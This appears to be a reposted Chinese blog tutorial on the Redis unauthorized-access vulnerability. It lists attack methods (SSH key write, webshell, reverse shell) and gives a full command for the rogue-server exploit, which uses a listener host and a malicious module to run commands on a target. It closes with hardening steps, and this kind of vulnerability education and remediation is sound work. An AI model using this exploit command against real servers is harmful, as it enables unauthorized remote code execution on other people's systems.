标签:漏洞 Redis 重启 redis 访问 exp 授权
0x01 Redis是什么?
Redis是数据库,一个高性能的key-value存储系统,是使用ANSI C语言编写的。
0x02 Redis未授权访问漏洞
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
0x03 影响版本
影响版本Redis未授权访问在4.x/5.0.5版本以下
0x04 攻击手段
1.直接未授权访问,对redis数据库的操作
2.ssh免密钥登录(有思维导图)
3.对redis数据库写马子拿shell,与第二点条件和思路差不多
4.写进反弹shell,设置反弹时间反弹。
5.利用现有exp
0x05 漏洞复现(利用现有exp)
poc地址:
https://github.com/vulhub/redis-rogue-getshell
编译
攻击
python3 redis-master.py -h
python3 redis-master.py -r 192.168.227.128 -p 6379 -L 192.168.227.129 -P 8989 -f RedisModulesSDK/exp.so -c "id"
修复方案
1.禁止一些高危命令(重启redis才能生效)
2.以低权限运行 Redis 服务(重启redis才能生效)切身体会
3.为 Redis 添加密码验证(重启redis才能生效)
4.禁止外网访问 Redis(重启redis才能生效)
5.修改默认端口
6.保证 authorized_keys 文件的安全
7.设置防火墙策略
标签:漏洞,Redis,重启,redis,访问,exp,授权 来源: https://www.cnblogs.com/dyanbk/p/13276467.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。